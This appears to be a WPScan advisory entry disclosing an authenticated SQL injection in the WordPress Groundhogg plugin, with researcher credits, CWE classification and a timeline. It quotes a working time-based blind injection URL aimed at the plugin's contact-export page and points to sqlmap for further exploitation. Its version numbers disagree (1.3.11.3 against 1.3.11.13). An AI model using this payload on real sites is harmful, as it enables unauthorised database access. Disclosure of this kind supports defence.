Groundhogg <= 1.3.11.3 - Authenticated SQL Injection



Description
Wordpress Groundhogg plugin with a version lower than 1.3.11.3 is affected by an Authenticated SQL Injection vulnerability.
Proof of Concept
# Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

Affects Plugin

References

URL https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-sql-injection-vulnerability/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Lucian Ioan Nitescu
Submitter Lucian Ioan Nitescu
Submitter Website https://nitesculucian.github.io/
Submitter Twitter https://twitter.com/LucianNitescu
Views 2515
Verified No
WPVDB ID 9924

Timeline

Publicly Published 2019-10-23 (about 2 months ago)
Added 2019-10-24 (about 2 months ago)
Last Updated 2019-11-28 (17 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin